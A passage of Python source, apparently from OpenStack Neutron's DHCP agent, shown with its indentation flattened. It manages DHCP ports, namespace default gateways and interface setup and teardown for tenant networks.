return 'dhcp%s-%s' % (host_uuid, network.id)
def _get_device(self, network, port):
"""Return DHCP ip_lib device for this host on the network."""
interface_name = self.get_interface_name(network, port)
return ip_lib.IPDevice(interface_name,
self.root_helper,
network.namespace)
def _set_default_route(self, network, port):
"""Sets the default gateway for this dhcp namespace.
This method is idempotent and will only adjust the route if adjusting
it would change it from what it already is. This makes it safe to call
and avoids unnecessary perturbation of the system.
"""
device = self._get_device(network, port)
gateway = device.route.get_gateway()
if gateway:
gateway = gateway['gateway']
for subnet in network.subnets:
skip_subnet = (
subnet.ip_version != 4
or not subnet.enable_dhcp
or subnet.gateway_ip is None)
if skip_subnet:
continue
if gateway != subnet.gateway_ip:
m = _('Setting gateway for dhcp netns on net %(n)s to %(ip)s')
LOG.debug(m, {'n': network.id, 'ip': subnet.gateway_ip})
device.route.add_gateway(subnet.gateway_ip)
return
# No subnets on the network have a valid gateway. Clean it up to avoid
# confusion from seeing an invalid gateway here.
if gateway is not None:
msg = _('Removing gateway for dhcp netns on net %s')
LOG.debug(msg, network.id)
device.route.delete_gateway(gateway)
def setup_dhcp_port(self, network):
"""Create/update DHCP port for the host if needed and return port."""
device_id = self.get_device_id(network)
subnets = {}
dhcp_enabled_subnet_ids = []
for subnet in network.subnets:
if subnet.enable_dhcp:
dhcp_enabled_subnet_ids.append(subnet.id)
subnets[subnet.id] = subnet
dhcp_port = None
for port in network.ports:
port_device_id = getattr(port, 'device_id', None)
if port_device_id == device_id:
port_fixed_ips = []
for fixed_ip in port.fixed_ips:
port_fixed_ips.append({'subnet_id': fixed_ip.subnet_id,
'ip_address': fixed_ip.ip_address})
if fixed_ip.subnet_id in dhcp_enabled_subnet_ids:
dhcp_enabled_subnet_ids.remove(fixed_ip.subnet_id)
# If there are dhcp_enabled_subnet_ids here that means that
# we need to add those to the port and call update.
if dhcp_enabled_subnet_ids:
port_fixed_ips.extend(
[dict(subnet_id=s) for s in dhcp_enabled_subnet_ids])
dhcp_port = self.plugin.update_dhcp_port(
port.id, {'port': {'fixed_ips': port_fixed_ips}})
if not dhcp_port:
raise exceptions.Conflict()
else:
dhcp_port = port
# break since we found port that matches device_id
break
# DHCP port has not yet been created.
if dhcp_port is None:
LOG.debug(_('DHCP port %(device_id)s on network %(network_id)s'
' does not yet exist.'), {'device_id': device_id,
'network_id': network.id})
port_dict = dict(
name='',
admin_state_up=True,
device_id=device_id,
network_id=network.id,
tenant_id=network.tenant_id,
fixed_ips=[dict(subnet_id=s) for s in dhcp_enabled_subnet_ids])
dhcp_port = self.plugin.create_dhcp_port({'port': port_dict})
if not dhcp_port:
raise exceptions.Conflict()
# Convert subnet_id to subnet dict
fixed_ips = [dict(subnet_id=fixed_ip.subnet_id,
ip_address=fixed_ip.ip_address,
subnet=subnets[fixed_ip.subnet_id])
for fixed_ip in dhcp_port.fixed_ips]
ips = [DictModel(item) if isinstance(item, dict) else item
for item in fixed_ips]
dhcp_port.fixed_ips = ips
return dhcp_port
def setup(self, network, reuse_existing=False):
"""Create and initialize a device for network's DHCP on this host."""
port = self.setup_dhcp_port(network)
interface_name = self.get_interface_name(network, port)
if ip_lib.device_exists(interface_name,
self.root_helper,
network.namespace):
if not reuse_existing:
raise exceptions.PreexistingDeviceFailure(
dev_name=interface_name)
LOG.debug(_('Reusing existing device: %s.'), interface_name)
else:
self.driver.plug(network.id,
port.id,
interface_name,
port.mac_address,
namespace=network.namespace)
ip_cidrs = []
for fixed_ip in port.fixed_ips:
subnet = fixed_ip.subnet
net = netaddr.IPNetwork(subnet.cidr)
ip_cidr = '%s/%s' % (fixed_ip.ip_address, net.prefixlen)
ip_cidrs.append(ip_cidr)
if (self.conf.enable_isolated_metadata and
self.conf.use_namespaces):
ip_cidrs.append(METADATA_DEFAULT_CIDR)
self.driver.init_l3(interface_name, ip_cidrs,
namespace=network.namespace)
# ensure that the dhcp interface is first in the list
if network.namespace is None:
device = ip_lib.IPDevice(interface_name,
self.root_helper)
device.route.pullup_route(interface_name)
if self.conf.use_namespaces:
self._set_default_route(network, port)
return interface_name
def update(self, network):
"""Update device settings for the network's DHCP on this host."""
if self.conf.use_namespaces:
device_id = self.get_device_id(network)
port = self.plugin.get_dhcp_port(network.id, device_id)
if not port:
raise exceptions.NetworkNotFound(net_id=network.id)
self._set_default_route(network, port)
def destroy(self, network, device_name):
"""Destroy the device used for the network's DHCP on this host."""
self.driver.unplug(device_name, namespace=network.namespace)
self.plugin.release_dhcp_port(network.id,
self.get_device_id(network))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.